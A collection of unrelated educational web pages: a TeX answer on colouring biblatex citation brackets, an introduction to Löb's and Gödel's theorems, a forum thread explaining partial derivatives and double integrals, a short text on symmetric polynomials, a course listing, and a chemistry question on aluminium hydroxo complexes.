\bibliography{articles,reports,books,reviews}
\end{document}
With natbib I get this:
I want the same with biblatex and biber.
• You mean the square brackets around the entries in the bibliography? Or those in the text? Or both? In answering this question, please provide us with a minimal working example (MWE) that we can use. Helping us really does help you. – Werner Apr 25 '14 at 0:38
• Quickly searching through the natbib documentation, I didn't find "color" there, so I don't know what kind of functionality that is. (Something related and common is to color the reference with hyperref since it's a link, with \usepackage[colorlinks]{hyperref}, but in "[1]" that will color only "1", and not the brackets.) – pst Apr 25 '14 at 5:23
• Do you want the brackets to also be hyperlinked? – moewe Apr 25 '14 at 8:07
• @pst with the \bibpunct command – Mario Apr 25 '14 at 17:25
What you see there is that hyperref colours (cite) links (because you told it so in colorlinks=true, citecolor=CeruleanRef). Normally, when you cite only a certain part of that citation is actually turned into a link, with the numeric style only the number itself, not the brackets are linked. Your natbib fix did not extend the link to the brackets, it just coloured them in.
We can emulate that behaviour by adding \color{CeruleanRef} to the wrapper of the \cite command. (I took it from numeric.cbx; if you use numeric-comp.cbx or another style, copy the definition of \cite from there.)
\DeclareCiteCommand{\cite}[\color{CeruleanRef}\mkbibbrackets]% <--- this is new
{\usebibmacro{prenote}}
{\usebibmacro{citeindex}%
\usebibmacro{cite}}
{\multicitedelim}
{\usebibmacro{postnote}}
for numeric-comp
\DeclareCiteCommand{\cite}[\color{CeruleanRef}\mkbibbrackets]
{\usebibmacro{cite:init}%
\usebibmacro{prenote}}
{\usebibmacro{citeindex}%
\usebibmacro{cite:comp}}
{}
{\usebibmacro{cite:dump}%
\usebibmacro{postnote}}
Remember: This will not actually create a hyperlink, the text will just look like one. Hyperlinks with ranges that big can only be created in very special cases with a huge amount of work. (With numeric-comp, linking the brackets would not even make sense: where would the link from the bracket point to?)
MWE
\documentclass{article}
\usepackage[T1]{fontenc}
\usepackage[backend=biber, style=numeric-comp]{biblatex}
\usepackage[usenames,dvipsnames,svgnames,table]{xcolor}
\definecolor{CeruleanRef}{RGB}{12,127,172}
\addbibresource{biblatex-examples.bib}
\DeclareCiteCommand{\cite}[\color{CeruleanRef}\mkbibbrackets]
{\usebibmacro{cite:init}%
\usebibmacro{prenote}}
{\usebibmacro{citeindex}%
\usebibmacro{cite:comp}}
{}
{\usebibmacro{cite:dump}%
\usebibmacro{postnote}}
\begin{document}
\cite{companion,knuth:ct:b,knuth:ct:c} and \cite{baez/article} \cite{aksin}
\printbibliography
\end{document}
One could also use a kludge as suggested in my comment
\makeatletter
\renewcommand*{\bibleftbracket}{\blx@postpunct\textcolor{red}{[}}
\renewcommand*{\bibrightbracket}{\blx@postpunct\textcolor{red}{]}\midsentence}
\makeatother
This does have side-effects though: All opening brackets will be coloured red.
• the idea of having colored brackets is not just for linking, but for reading a printed document (aesthetic reasons). – Mario Apr 29 '14 at 14:09
https://arbital.greaterwrong.com/p/intro_modern_logic?l=661
# An introductory guide to modern logic
Welcome! We are about to start a journey through modern logic, in which we will visit two central results of this branch of mathematics, which are often misunderstood and sometimes even misquoted: Löb’s theorem and Gödel’s second incompleteness theorem.
Modern logic can be said to have been born in the ideas of Gödel regarding the amazing property of self-reference that plagues arithmetic. Badly explained, this means that we can force an interpretation over natural numbers which relates how deductions are made in arithmetic to statements about arithmetical concepts such as divisibility.
This guide targets people who are already comfortable with mathematical thinking and mathematical notation. However, it requires no specific background knowledge about logic or math. The guide starts lightweight and gets progressively more technical.
# Formal proofs
What is logic anyway? A short explanation refers to the fact that we humans happen to be able to draw conclusions about things we have not experienced by using facts about how the world is. For example, if you see somebody enter the room dripping water, then you infer that it is raining outside, even though you have not seen the rain yourself.
This may seem trivial, but what if we are trying to program that into a computer? How can we capture this intuition of what reasoning is and write down the rules for proper reasoning in a way precise enough to be turned into a program?
To accomplish that is to do logic. The ultimate goal is to have an efficient procedure which, if followed, allows us to deduce every true consequence of a set of premises, a procedure so simple that it could be taught to a dumb machine which only follows mechanical operations.
So let’s try to formalize reasoning!
We are going to draw inspiration from mathematicians and see what they are doing when proving a result.
Though the method is often convoluted, nonlinear and hard to understand, in essence what they are doing is writing down some hypotheses and facts that they assume to be true. Then they apply some manipulation rules which, when applied to true premises, are assumed to derive true facts. After iterating this process, they arrive at the desired result.
## Getting formal
Well, let’s wrap together this intuitive process in a formal definition.
A proof of a sentence $$\phi$$ is a sequence of well formed sentences such that every sentence in the sequence is either an axiom or can be derived of the previous sentences using a derivation rule, and the final sentence in the sequence is $$\phi$$. A sentence which has a proof is called a theorem.
Don’t be scared by all the new terms! Let’s go briefly over them.
A well formed sentence is just a combination of letters which satisfies a certain criteria which makes them easy to interpret. The sentences we will be dealing with are logical formulas, which use a particular set of symbols such as $$=, \wedge, \implies$$. Our goal is to assign truth values to sentences. That is, to say if particular sentences are true or false.
An axiom is something that we assume to be true without requiring a proof. For example, a common axiom in arithmetic is assuming that $$0$$ is different from $$n+1$$ for all natural numbers $$n$$. Or, expressed as a well formed sentence, $$\forall n.\ 0 \not = n+1$$. (Note: the symbol $$\forall$$ is an upside-down A and means "for all".)
A derivation rule is a valid basic step in a proof. Perhaps the simplest example is modus ponens. Modus ponens tells you that if you have somehow deduced $$A\implies B$$ and also $$A$$, then you can deduce $$B$$ from both facts.
Those three components constitute the basis of a logical system for reasoning: a criterion for constructing well formed sentences, a set of axioms which we know to be true (note: the set of axioms does not have to be finite! In particular, we can specify a criterion that identifies infinitely many axioms; this is called an axiom schema), and some derivation rules which allow us to deduce new conclusions.
For a rather silly example, let’s consider the system $$A$$ with the following components:
• Well formed sentences: the set of words in the Webster dictionary.
• Axioms: The word ‘break’.
• Deduction rules: If a word $$w$$ is a theorem of $$A$$, then so is any word which differs from $$w$$ in one letter, whether by adding, removing, or replacing a letter anywhere in $$w$$.
Thus the word 'trend' is a theorem of $$A$$, as shown by the four-step proof 'break—bread—tread—trend'. The first sentence in the proof is an axiom. Every sentence after it is deduced from our deduction rule using the previous sentence as a premise. A toy checker for this system is sketched below.
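Here is a minimal Python sketch of a proof checker for system $$A$$ (the dictionary check for well-formedness is omitted for brevity, and the axiom set is passed in as a parameter):

def one_edit_apart(u, v):
    # System A's deduction rule: v is obtainable from u by adding,
    # removing, or replacing exactly one letter.
    if abs(len(u) - len(v)) > 1:
        return False
    if len(u) == len(v):
        return sum(a != b for a, b in zip(u, v)) == 1
    longer, shorter = (u, v) if len(u) > len(v) else (v, u)
    return any(longer[:i] + longer[i + 1:] == shorter
               for i in range(len(longer)))

def is_proof(steps, axioms=('break',)):
    # Each step must be an axiom or derivable from an earlier step.
    for i, word in enumerate(steps):
        if word not in axioms and \
           not any(one_edit_apart(prev, word) for prev in steps[:i]):
            return False
    return True

assert is_proof(['break', 'bread', 'tread', 'trend'])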
## Interpretations
Given how we defined a logical system, there is a certain degree of freedom we have, as we can choose the underlying sets of well formed sentences, the axioms and the deduction rules. However, as shown in the example above, if we want to make meaningful deductions we should be careful in what components do we choose for our logical system.
The criteria we use to choose these components is intertwined with the model we are trying to reason about. Models can be anything that captures an aspect of the world, or just a mathematical concept. To put it simply, they are the thing we are trying to reason about.
Depending on what kind of entities the model has, we will lean towards a particular choice of sentences. For example, if our model consists in just facts which are subject to some known logical relations we could use the language of propositional logic. But if our model contains different objects which are related in different ways, we will prefer to use the language of first order logic.
Each model has an interpretation associated, which relates the terms in the sentences to aspects of the model. For all practical purposes, a model and its interpretation are the same once we have fixed the language, and thus we will use the terms as synonyms.
Then, depending on how the model evolves and what things we can infer from what facts, we should choose some deduction rules. Together, the sentences and the deduction rules specify a class of possible models. If the deduction rules correctly capture the properties of the class of models we had in mind, in the sense that from true premises we really derive true consequences, then we say that they are sound.
Intuitively, we say that the choice of language and deduction rules decides the “shape” that our models will have. Every model with such a shape will be part of the universe of models specified by those components of a logical system.
With this imagery of a class of models, we can think of axioms as an attempt to reduce the class of models and pin down the concrete model we are interested in, by choosing as axioms sentences whose interpretation is true in only the model we are interested in and in no other model (note: sadly, there are occasions in which this is just not possible).
A property tightly related to soundness is completeness. A system is complete if every sentence which is true under all interpretations which satisfy our axioms has a proof.
It is important to realize that logical systems can be talking about many models at once. In particular, if two interpretations satisfy the axioms but disagree on the truth of a particular sentence, then that sentence will be undecidable in our model.
This suggests a technique for proving independence of logical statements. To show that a certain sentence is independent from some axioms, construct two models which satisfy those axioms but contradict each other on the value of the statement. A nice example of this is how Lobachevsky showed that Euclid's fifth postulate is independent from the other four postulates.
## Introducing PA
For our purposes, we will stick to a particular logical system called Peano arithmetic. This particular choice of axioms and deduction rules is interesting because it reflects a lot of our intuitions about how numbers work, which in turn can be used to talk about many phenomena in the real world. In particular, they can talk about themselves.
Before we move on to this "talking about themselves" business, I am going to introduce more notation. We will refer to Peano Arithmetic as $$PA$$. If a sentence $$\phi$$ follows from the axioms of $$PA$$ and its deduction rules (i.e., there is a proof of $$\phi$$ using only axioms and deduction rules from $$PA$$), we will say that $$PA\vdash \phi$$, read as "$$PA$$ proves $$\phi$$".
# Self reference and the provability predicate
Let’s try to get an intuition of what I mean when I say that numbers can talk about themselves.
The first key intuition is that we can refer to arbitrary sequences of characters using numbers. For example, I can declare that from now onwards the number $$1$$ is going to refer to the sequence of letters "I love Peano Arithmetic". Furthermore, using a clever rule to relate numbers and sentences, I can make sure that every possible finite sentence gets assigned a number (this is called an encoding).
A simple encoding goes by the name of Gödel encoding, and consists of assigning a number to every symbol we allow in sentences. For example, $$=$$ could be $$1$$, and $$a$$ could be $$0$$, and so on and so forth. Then we can encode a sentence consisting of $$n$$ symbols, with assigned numbers $$a_1, a_2, \ldots, a_n$$, as the number $$2^{a_1}3^{a_2}5^{a_3}\cdots p_n^{a_n}$$, where $$p_n$$ is the $$n$$th prime. That is, we take the product of the first $$n$$ primes with exponents equal to the assigned numbers. (This is possible because every number can be decomposed as a unique product of primes.)
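As a toy illustration, here is the scheme in Python (the five-symbol table is an arbitrary assumption; a real encoding would cover the whole alphabet of the language):

SYMBOLS = {'=': 1, 'a': 0, '+': 2, '0': 3, 'S': 4}

def primes():
    # Yield 2, 3, 5, ... by trial division; fine for short sentences.
    n = 2
    while True:
        if all(n % d for d in range(2, int(n ** 0.5) + 1)):
            yield n
        n += 1

def encode(sentence):
    # Product of the first len(sentence) primes, with exponents
    # given by the symbol table.
    code = 1
    for p, ch in zip(primes(), sentence):
        code *= p ** SYMBOLS[ch]
    return code

assert encode('a=a') == 2**0 * 3**1 * 5**0  # == 3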
The process can be repeated to encode sequences of sentences as single numbers. Thus, we can encode whole proofs as single numbers. We could also encode sequences of sequences of sentences, but that is going too far for our purposes.
So the point is, we can trade sentences for numbers and vice versa. Can we also talk about deduction using numbers?
It turns out we can! With the encoding we have chosen it is cumbersome to show, but we can write a predicate $$Axiom(x)$$ in the language of Peano Arithmetic such that $$PA\vdash Axiom(\textbf{n})$$ if and only if $$n$$ is a number which encodes an axiom of $$PA$$. (A predicate is a well formed sentence in which we have left one or more "holes" in the form of variables, which we can substitute for literal numbers or quantify over. For example, we can have the predicate $$IsEqualTo42(x)$$ of the form $$x = 42$$. Then $$PA\vdash IsEqualTo42(42)$$ and $$PA\vdash \exists x.\ IsEqualTo42(x)$$, but $$PA\not\vdash IsEqualTo42(7)$$.)
Furthermore, a deduction rule which requires $$n$$ premises can be represented by an $$(n+1)$$-ary predicate $$Rule(p_1, p_2,..., p_n, r)$$, which is provable in $$PA$$ if and only if $$p_1, ..., p_n$$ are numbers encoding valid premises for the rule and $$r$$ encodes the corresponding deduced fact.
A bit more work and we can put together a predicate $$Proof(x,y)$$, which is provable in $$PA$$ if and only if $$x$$ encodes a valid proof of the sentence encoded by $$y$$. Isn’t that neat!?
Since we are not so interested in the proof itself as in the fact that there is a proof at all, we are going to construct the provability predicate $$\exists x.\, Proof(x,y)$$, which we will call $$\square_{PA}(y)$$. ($$\exists$$ is a backwards E and means “there exists”. So then, $$\square_{PA}(x)$$ literally means “there is a proof in $$PA$$ of $$x$$”.)
Thus, since the number $$\ulcorner 1+1=2 \urcorner$$ corresponds to the sentence $$1+1=2$$, we have $$PA\vdash \square_{PA}(\ulcorner 1+1=2 \urcorner)$$. That is, $$PA$$ proves that there is a proof in $$PA$$ of $$1+1=2$$.
Now, the predicates we have seen so far are quite intuitive and nicely behaved, in the sense that their deducibility from $$PA$$ matches quite well what we would expect from our intuition. However, once we add the existential quantifier in front of $$Proof(x,y)$$ we get some nasty side effects.
The thing is that $$PA$$ “hallucinates” numbers whose existence it can neither confirm nor refute: the so-called non-standard numbers, which are no mere natural numbers but infinite numbers far out on the horizon of mathematics. While $$PA$$ cannot prove their existence, neither can it prove their non-existence. So $$PA$$ becomes wary of asserting that no proof exists for a certain false sentence. After all, one of those non-standard numbers might encode a proof of the false sentence! Who is to prove otherwise?
Can we patch this somehow? Maybe by adding more axioms or deduction rules to $$PA$$ so that it can prove that those numbers do not exist? The answer is yes, but not really. While it is doable in principle, the resulting theory becomes too difficult to manage, and we can no longer use it for effective deduction. (Technically, $$PA$$ loses its semidecidability that way.)
We will now proceed to prove two technical results which better formalize this idea: Löb’s theorem and Gödel’s Second Incompleteness Theorem.
# Löb’s theorem
Löb’s result follows from the intuitive properties of deduction that the provability predicate actually manages to capture. This points to the fact that it is not our definition that is wrong, but rather that there is a fundamental impossibility in logic.
The intuitive, good properties of $$\square_{PA}$$ are known as the Hilbert-Bernays derivability conditions, and are as follows:
1. If $$PA\vdash A$$, then $$PA\vdash \square_{PA}(\ulcorner A\urcorner)$$.
2. $$PA\vdash \square_{PA}(\ulcorner A\rightarrow B\urcorner) \rightarrow [\square_{PA}(\ulcorner A \urcorner)\rightarrow \square_{PA}(\ulcorner B \urcorner)]$$
3. $$PA\vdash \square_{PA}(\ulcorner A\urcorner) \rightarrow \square_{PA} \square_{PA} (\ulcorner A\urcorner)$$.
Let’s go over each of them in turn.
1) says reasonably that if $$PA$$ proves a sentence $$A$$, then it also proves that there is a proof of $$A$$.
2) affirms that if you can prove that $$A$$ implies $$B$$, then the existence of a proof of $$A$$ implies the existence of a proof of $$B$$. This is quite intuitive: we can concatenate a proof of $$A$$ with a proof of $$A\rightarrow B$$ and deduce $$B$$ by an application of modus ponens.
3) is the formalization of 1) inside $$PA$$ itself: $$PA$$ proves that if a sentence is provable, then the sentence asserting its provability, $$\square_{PA}(\ulcorner A \urcorner)$$, is provable too.
One more ingredient is needed to derive Löb’s: the diagonal lemma, which states that for all predicates $$\phi(x)$$ there is a formula $$\psi$$ such that $$PA\vdash \psi \leftrightarrow \phi(\ulcorner \psi \urcorner)$$.
The details of the proof can be found in Proof of Löb’s theorem.
The details are not essential to the main idea, but it can be illustrative to work through the formal proof. Plus, it reinforces the intuition about non-standard numbers we talked about before.
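For reference, here is a compressed version of the standard argument, writing $$\square$$ for $$\square_{PA}$$ and suppressing Gödel quotes for readability. Assume $$PA\vdash \square A \rightarrow A$$. By the diagonal lemma, pick $$\psi$$ such that $$PA\vdash \psi \leftrightarrow (\square \psi \rightarrow A)$$. Then:

1. $$PA\vdash \psi \rightarrow (\square\psi \rightarrow A)$$ (diagonal lemma, left to right).
2. $$PA\vdash \square(\psi \rightarrow (\square\psi \rightarrow A))$$ (condition 1 applied to step 1).
3. $$PA\vdash \square\psi \rightarrow \square(\square\psi \rightarrow A)$$ (condition 2 applied to step 2).
4. $$PA\vdash \square\psi \rightarrow (\square\square\psi \rightarrow \square A)$$ (condition 2 applied to step 3).
5. $$PA\vdash \square\psi \rightarrow \square A$$ (step 4 combined with condition 3).
6. $$PA\vdash \square\psi \rightarrow A$$ (step 5 and the assumption $$\square A \rightarrow A$$).
7. $$PA\vdash \psi$$ (step 6 and the diagonal lemma, right to left).
8. $$PA\vdash \square\psi$$ (condition 1 applied to step 7).
9. $$PA\vdash A$$ (steps 6 and 8 by modus ponens).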
What is really interesting is that now we are in a position to state and understand Löb’s theorem!
Löb’s theorem
If $$PA\vdash \square_{PA}(\ulcorner A\urcorner) \rightarrow A$$, then $$PA\vdash A$$.
(or equivalently, if $$PA\not\vdash A$$ then $$PA\not\vdash \square_{PA}(\ulcorner A\urcorner) \rightarrow A$$).
Talk about an unintuitive result! Let’s take a moment to ponder its meaning.
Intuitively, we should be able to derive from the existence of a proof of $$A$$ that $$A$$ is true. After all, proofs are guarantees that something really follows from the axioms, so if we got those right and our derivation rules are correct then $$A$$ should be true. However, $$PA$$ does not trust that being able to prove the existence of a proof is enough to make $$A$$ true!

Indeed, it needs to see the proof for itself. In other words, there must be an $$n$$ such that $$PA\vdash Proof(\textbf n, \ulcorner A\urcorner)$$. Then it will trust that it is indeed the case that $$A$$.

I will repeat that, because it reads like a tongue twister. Suppose somebody came and assured $$PA$$ that from the axioms of $$PA$$ it follows that there exists a number $$n$$ satisfying $$Proof(\textbf n,\ulcorner A\urcorner)$$. Then $$PA$$ would say: show me the proof, or I am going to assume that your $$n$$ is actually a non-standard number and you a friggin’ liar.

If somebody just comes saying he has a proof, but produces none, $$PA$$ becomes suspicious. After all, the proof in question could be a non-standard proof encoded by one of the dreaded non-standard numbers! Who is going to trust that!
# Gödel II
And finally we arrive at Gödel’s Second Incompleteness Theorem, perhaps the most widely misunderstood theorem in all of mathematics.

We first need to introduce the notion of consistency. Simply enough, a logical system is consistent if it does not prove a contradiction, where a contradiction is something that can never be true. For example, it can never be the case that $$P\wedge \neg P$$, so $$P\wedge \neg P$$ is a contradiction no matter what $$P$$ is. We use the symbol $$\bot$$ to represent a contradiction.
The statement of GII is as follows:
Gödel's Second Incompleteness Theorem (concrete form): If $$PA$$ is consistent, then $$PA\not \vdash \neg \square_{PA}(\bot)$$.
Notice that GII follows quite directly from Löb’s theorem. Actually, Löb’s theorem also follows from GII, so the two results are equivalent.
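To make the “follows quite directly” concrete, here is the one-step derivation: instantiate Löb’s theorem with $$A = \bot$$. The sentence $$\neg \square_{PA}(\bot)$$ is just another way of writing $$\square_{PA}(\bot) \rightarrow \bot$$, so if $$PA\vdash \neg\square_{PA}(\bot)$$ then Löb’s theorem gives $$PA\vdash \bot$$, contradicting consistency. Hence a consistent $$PA$$ cannot prove $$\neg\square_{PA}(\bot)$$.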
This result can be interpreted as follows: you cannot have a system as expressive as $$PA$$ in which you can talk about deduction with complete certainty, and thus about consistency. In particular, such a system cannot prove that it itself is consistent.
The result is startling, but in light of our previous exposition it is clear what is going on: there is always the shadow of the non-standard numbers menacing our deductions.
# Summary
And that concludes our introduction to formal logic!
To recall some important things we have learned:
• Logical systems capture the intuition behind deductive reasoning. They are composed of axioms and deductive rules that are chained to compose proofs.
• Simple logical systems that are used to talk about numbers, such as $$PA$$, can be interpreted as talking about many things through encodings, and in particular they can talk about themselves.
• There are expressions in logic that capture the concepts involved in deduction. However, the most important of them, the provability predicate $$\square_{PA}$$, fails to satisfy some intuitive properties due to the inability of $$PA$$ to prove that non-standard numbers do not exist.
• Löb’s theorem says that if $$PA$$ cannot prove $$A$$, then neither can it prove that $$A$$ follows from $$\square_{PA}(\ulcorner A\urcorner)$$.
• $$PA$$ cannot prove its own consistency, in the sense that it cannot prove that the provability predicate is never satisfied by a contradiction.
If you want to get deeper in the rabbit hole, read about model theory and semantics or modal logic.
https://www.physicsforums.com/threads/integrating-differentiating-several-variables.512505/
# Integrating/differentiating several variables
1. Jul 7, 2011
### mexijo
Hi all! I am just a high school student and have only taken AP Calculus AB, but I have a question which hopefully some of you will be able to answer: how do you take the derivative/integral of a multivariable equation? How is it decided which variable you are taking derivatives/integrals with respect to, and what is this doing conceptually?

I'm sorry if this is a dumb question, but all the other websites I've tried on the web use terminology and symbols I'm not familiar with, and are very confusing.
2. Jul 7, 2011
### Saitama
Hi mexijo!!
Firstly, sorry, I don't understand what you mean by "AP" and "AB".

You said that you are in high school at present. Trying to go into multivariable calculus at this stage is dangerous (well, not exactly). You should first start with single-variable calculus, which is also fun. Why do you want to go to a higher level right now?
To know with respect to what we are taking the integral, let's take an example:
$$\int x^2 dx$$
Do you understand what this dx is? This "dx" conveys that we are integrating with respect to x.
3. Jul 7, 2011
### BrianMath
Like the poster above said, the $dx$ tells you that you're working with respect to $x$.
@Pranav-Arora: AP Calculus AB is an Advanced Placement Calculus class, which is basically the Calculus 1 and 2 you find in colleges. Actually, a high enough score in the Advanced Placement test gives you the college credits for Calculus 1 and 2 when you enter, meaning you get to skip them and go straight to multivariable as a freshman.
Now, back to the topic at hand, let's say you have a function of several variables
$$f(x,y) = 3e^x\sin y + x$$
When you differentiate, you hold the variable that you aren't differentiating with respect to constant.
Here's differentiating with respect to x:
$$\frac{\partial}{\partial x}f(x,y) = \frac{\partial}{\partial x}(3e^x\sin y + x) = 3e^x\sin y + 1$$
The squiggly d just tells you that this is a partial derivative, because you're only taking the derivative of one part (the $x$ part, in this case). Since you're only differentiating the $x$ part, just pretend that $y$ is a constant, like $\pi$ (I like to think in terms of letter constants since that makes it clear that it is a letter, but a constant one).
Now, when differentiating with respect to y:
$$\frac{\partial}{\partial y}f(x,y) = \frac{\partial}{\partial y}(3e^x\sin y + x) = 3e^x\cos y$$
Since the $x$ is constant when you differentiate with respect to $y$, it gets dropped out just like any other constant.
Another notation for a partial derivative is subscript notation, where the variable you're differentiating with respect to is the subscript of the function.
$$\frac{\partial}{\partial x}f(x,y) = f_x(x,y)$$
Conceptually, a derivative is how sensitive a function is to change, or, more physically speaking, the "speed" at which it changes. Another good concept is slope, you're finding the slope of a line tangent to that particular point on the curve.
For partial derivatives, remember that you're differentiating with respect to one variable, and holding all others constant. That means you're finding the slope or the rate of change in that particular direction, regardless of what the others are doing.
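If you want to check these results mechanically, a quick SymPy sketch (assuming the library is available) reproduces the two partial derivatives above:

```python
from sympy import symbols, exp, sin, diff

x, y = symbols('x y')
f = 3*exp(x)*sin(y) + x

print(diff(f, x))  # 3*exp(x)*sin(y) + 1   (y treated as a constant)
print(diff(f, y))  # 3*exp(x)*cos(y)       (x treated as a constant)
```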
For integration, you have multiple integration:
2 integrals (Double Integral)
$$\int \int_R f(x,y)dA$$
3 integrals (Triple Integral)
$$\int \int \int_R f(x,y, z)dV$$
Don't get too confused over what $R$ is, it's just a placeholder for all of the limits of integration. It is the region you're integrating over.
Just like when you do a definite integral in single variable calculus, in multivariable you have to go from "a to b" on one and "c to d" on the next, etc.
Also, as for what $dA$ and $dV$ are: $dA$ is the product of $dx$ and $dy$ (for double integrals), and $dV$ is the product of all three with $dz$ (for triple integrals). $dA$ just stands for $dxdy$ or $dydx$ (depending on which order you integrate in), and, from an intuitive standpoint, is a differential of area (an extremely small area) that you multiply by a height ($f(x, y)$) and sum up ($\int$). In single variable calculus, you used $dx$ when integrating (or $dy$, sometimes). Remember that when you do a definite integral, you're actually summing up an infinite number of infinitely thin rectangles to find area. In multivariable, you're now summing up cuboids to find volume (for double integrals).
So for a double integral, let's just say you have the following:
$$\int_0^1 \int_2^3 (2y+x)dxdy$$
So, just like partial derivatives, whatever you're integrating with respect to, hold everything else constant. In these integrals, you work from the inside out.
So, after the first round of integrating, you have:
$$\int_0^1 \left[2xy + \frac{x^2}{2} \right]_{x=2}^{x=3}dy$$
Now just plug in the limits of integration, and integrate again:
$$\int_0^1 \left(2y + \frac{5}{2}\right)dy = \left[y^2 + \frac{5}{2}y \right]_0^1 = 1+\frac{5}{2}=\frac{7}{2}$$
So we have found the volume of this region, it is $\frac{7}{2}$.
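To double-check this computation, the same iterated integral can be run through SymPy (assuming it's installed):

```python
from sympy import symbols, integrate

x, y = symbols('x y')

# Work from the inside out: integrate over x first, holding y constant
inner = integrate(2*y + x, (x, 2, 3))  # -> 2*y + 5/2
outer = integrate(inner, (y, 0, 1))    # -> 7/2
print(inner, outer)
```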
You might also run into an indefinite integral, although I first saw a multivariable indefinite integral in differential equations.
Remember that in an indefinite integral, you always have to add a constant. The reason is that, since this is also called the antiderivative, the added constant could have been in the function that you integrated. Let's say $F\,'(x) = f(x)$: if $F(x)$ has any constant terms, they're gone when you differentiate to get $f(x)$. So when you integrate, you have to account for any arbitrary constant that may have been in $F(x)$.
For multivariable, however, these arbitrary constants are now functions of the variable you held constant. So, if $f(x, y) = F_x(x,y)$, let's say for $f(x,y) = 3xy^2$, we find the integral with respect to x.
$$\int f(x,y)dx = \int 3xy^2dx = \frac{3}{2}x^2y^2 + c(y)$$
Basically, if you had any purely $y$ terms in the function $F(x,y)$, they would have been dropped when differentiating with respect to $x$, since they're held constant. So, not only do we have to account for any constant, we have to account for any function of only $y$ when integrating with respect to $x$. The same is true for integrating a three variable expression:
$$\int f(x,y,z)dx = F(x, y, z) + c(y, z)$$
Hopefully this has helped you. This has been a very simple overview of only two topics in multivariable calculus; if you want to study further, I highly recommend going over to MIT's OpenCourseWare at http://ocw.mit.edu.
Last edited by a moderator: May 5, 2017
4. Jul 7, 2011
### Saitama
I use those resources and that Calculus book too. They are awesome.
Last edited by a moderator: May 5, 2017
5. Jul 8, 2011
### mexijo
Thanks so much BrianMath!! I got a 5 on the AP exam btw, and I'm interested in what multivariable calculus is really all about and wanted to teach myself, but I couldn't find anything that seemed geared towards people who didn't already know the subject. I checked out the MIT OpenCourseWare and it looks amazing. Awesome, thanks.
https://math.libretexts.org/Bookshelves/Abstract_Algebra/Book%3A_Introduction_to_Algebraic_Structures_(Denton)/01%3A_Symmetry/1.2%3A_Symmetric_Polynomials
# 1.2: Symmetric Polynomials
So far, we've considered geometric objects. Let's also have an example of something that isn't geometric. Let $$f$$ be a polynomial in some number of variables. For now, we'll stick with 3 variables, $$x, y$$, and $$z$$. We say that $$f$$ is a symmetric polynomial if every way of switching around (i.e., permuting) the variables leaves $$f$$ the same.
For example, the polynomial $$f(x,y,z)=x+y+z$$ is symmetric: switching the $$x$$ and the $$z$$, for example, gives $$z+y+x$$, which is the same as $$f$$. As a more complicated example, you can check that $$g(x,y,z)=x^2y+x^2z + y^2x + y^2z +z^2x + z^2y$$ is also symmetric.
On the other hand, $$h(x,y,z)=x^3+y^3+z$$ is not symmetric, since switching $$x$$ and $$z$$ produces $$z^3+y^3+x$$, which is not equal to $$h$$. This polynomial does have some symmetry, since switching $$x$$ and $$y$$ leaves $$h$$ the same, but we save the name 'symmetric polynomial' for the fully symmetric polynomials.
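One quick way to test claims like these is to substitute every permutation of the variables and compare. Here is a small SymPy sketch (assuming SymPy is available) that verifies $$g$$ is symmetric:

```python
from itertools import permutations
from sympy import symbols, simplify

x, y, z = symbols('x y z')
g = x**2*y + x**2*z + y**2*x + y**2*z + z**2*x + z**2*y

# g is symmetric iff every permutation of (x, y, z) leaves it unchanged
for perm in permutations((x, y, z)):
    swapped = g.subs(dict(zip((x, y, z), perm)), simultaneous=True)
    assert simplify(swapped - g) == 0

print("g is fixed by all 6 permutations")
# Running the same loop on h = x**3 + y**3 + z trips the assert,
# e.g. for the permutation swapping x and z.
```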
Exercise 1.2.0:
Let $$f$$ be a symmetric polynomial in $$n$$ variables. How many symmetries does $$f$$ have?

If you haven't tried a problem like this before - working in $$n$$ variables - it is extremely important to get some practice. Try writing down some different symmetric polynomials with small numbers of variables. Is there a formula that describes the number of symmetries in terms of the number of variables?
Symmetric polynomials are really interesting things, and we'll see them again when we talk about rings and vector spaces!
### Contributors
• Tom Denton (Fields Institute/York University in Toronto)
http://www.physics.brocku.ca/Courses/5P78/
PHYS 5P78 - Electronic Structure of Periodic and Aperiodic Systems

Instructor: TBA

Calendar entry: Density Functional and related theories; survey of (semi)empirical and first-principles electronic structure methods; electronic structure of liquid metals, metallic glasses, random alloys, and quasicrystals; effective medium theories, coherent potential, and other approximations; recursion and other real-space methods.
https://chemistry.stackexchange.com/questions/147548/what-exactly-is-hydrolysis-what-are-the-products-of-hydrolysis-of-aluminium/147570
# What exactly is hydrolysis? What are the products of hydrolysis of aluminium?
I came across three reactions while studying p-block compounds in inorganic chemistry.
$$\ce{2Al + 2NaOH + 6H2O -> 2 Na[Al(OH)4] + 3H2} \label{eq:1} \tag{1}$$
$$\ce{Al2O3 + 2NaOH + 3H2O -> 2 Na[Al(OH)4]} \label{eq:2} \tag{2}$$
$$\ce{Al2O3 + 6NaOH + 3H2O -> 2 Na3[Al(OH)6]} \label{eq:3} \tag{3}$$
Look at the above reactions. $$\eqref{eq:1}$$ and $$\eqref{eq:2}$$ have different reactants (aluminium and aluminium oxide) but they give the same product.

On the other hand, $$\eqref{eq:2}$$ and $$\eqref{eq:3}$$ have the same reactants but give different products.

What exactly is going on in these reactions? How do I predict which product is going to be formed in the greater amount?
The writers of the book haven't specified the reaction conditions.
Thanks
• What is strange about different reactants giving the same product or the same reactants giving different products ? It is quite common in chemistry. Chemistry is not mathematics. There are few laws , there are many more or less empirical rules and rest is to be remembered or found if needed. Unless experience teaches you to see unseen behaviour patterns. Mar 14 '21 at 11:45
• What exactly is the question? R1 and R2 differ in the products. R1 involves a redox; R2 & R3 don't. Also, they are unbalanced. Mar 14 '21 at 11:46
• For eventual writing and formatting of chemical or mathematical formulas or equations, see how to use MathJax Mar 14 '21 at 11:48
• Hydrolysis ... is any chemical reaction in which a molecule of water breaks one or more chemical bonds. The term is used broadly for substitution, elimination, and solvation reactions in which water is the nucleophile. Wikipedia Mar 14 '21 at 14:51
• Thank you so much Poutnik for formatting and answering to my question. Will use MathJax in future as I have learnt how to use it. Mar 15 '21 at 13:23
The difference between $$(2)$$ and $$(3)$$ is the amount of $$\ce{NaOH}$$ that has been used. If little $$\ce{NaOH}$$ is available, $$\ce{Al2O3}$$ reacts according to $$(2)$$. If much $$\ce{NaOH}$$ is available, it reacts according to $$(3)$$. So equation $$(3)$$ is equal to $$(2)$$ plus twice the following equation $$(4)$$: $$\ce{Na[Al(OH)4] + 2 NaOH -> Na3[Al(OH)6]\tag{4}}$$

